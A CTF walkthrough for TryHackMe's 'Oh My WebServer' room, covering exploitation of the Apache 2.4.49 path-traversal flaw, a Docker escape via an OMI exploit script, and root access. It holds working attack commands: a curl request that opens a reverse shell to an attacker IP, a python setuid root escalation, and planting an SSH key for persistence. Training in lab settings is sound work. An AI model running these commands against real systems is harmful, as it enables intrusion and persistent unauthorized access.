Oh My WebServer – Walkthrough En | TryHackMe – Write-up

Can you root me?

 

Oh My WebServer is a CTF medium from TryHackme. You have to exploit a well-known flaw in Apache 2.4.49 and then escape from Docker.

 

Enumération

Command :

nmap -T5 -p- -sVC 10.10.242.208

On port 80, there is Apache 2 running with version 2.4.49. There is a well known and easy to exploit vulnerability. CVE-2021-41773 

 

Initial Foothold

Exploiting this flaw is very simple. Just make a curl request to /cgi-bin to get a reverse shell.

Command :

curl -v ‘http://10.10.242.208:80/cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash’ -d ‘echo Content-Type: text/plain; echo; /bin/bash -i >& /dev/tcp/10.11.38.124/4848 0>&1’ -H « Content-Type: text/plain »

Lateral movement - daemon to root

We land in a Docker container as we can see with the command ls -al /

 

Capabilities

python3.7 a des capabilities setuid.

Command :

getcap -r 2>/dev/null

The gtfobins web site gives us a way to use this configuration to switch to the root account.

Command :

/usr/bin/python3.7 -c ‘import os; os.setuid(0); os.system(« /bin/sh »)’

Privilege Escalation

In the /tmp folder is an omi.py file. It is thanks to this that one has the possibility of leaving the container and obtaining root rights.

Command :

/usr/bin/python3.7 omi.py -t 10.10.242.208 -c ‘cat /root/flag.txt’

Sorry, the capture is not complete on command line. 

SSH connection

It is also possible to insert a public key in the file /root/.ssh/authorized_keys

Command to create a private/public key pair: :

ssh-keygen

Commande :

usr/bin/python3.7 omi.py -t 10.10.242.208 -c ‘echo public key here’ >> /root/.ssh/authorized_keys

Then connect with this command :

ssh root@10.10.242.208 -i id_rsa

#

That’s all folks

Thank you for taking the trouble to come to the site to read this Write-Up

I hope he has more of you and that he taught you new things.

Feel free to leave a comment or share this article.

Facebook
Twitter
LinkedIn
Pinterest